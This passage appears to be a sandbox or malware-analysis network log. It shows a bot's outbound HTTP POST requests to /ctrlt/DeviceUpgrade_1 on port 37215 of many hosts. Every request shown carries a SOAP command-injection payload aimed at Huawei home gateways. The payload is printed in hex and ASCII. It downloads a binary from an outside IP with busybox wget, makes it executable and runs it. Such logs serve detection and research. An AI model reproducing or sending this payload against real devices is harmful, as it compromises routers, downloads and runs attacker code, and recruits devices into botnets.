                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1731192.168.2.1537888197.0.55.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462798119 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1732192.168.2.1555448197.127.12.11137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462819099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1733192.168.2.1533678197.59.102.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462841034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1734192.168.2.1553400197.6.189.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462882042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1735192.168.2.1558308197.255.191.11637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462898970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1736192.168.2.1552324197.209.134.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462898970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1737192.168.2.1536146197.116.13.22837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462902069 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1738192.168.2.1560438197.62.52.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462919950 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1739192.168.2.1557474197.33.114.13337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462938070 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1740192.168.2.1554372197.207.43.1337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462963104 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
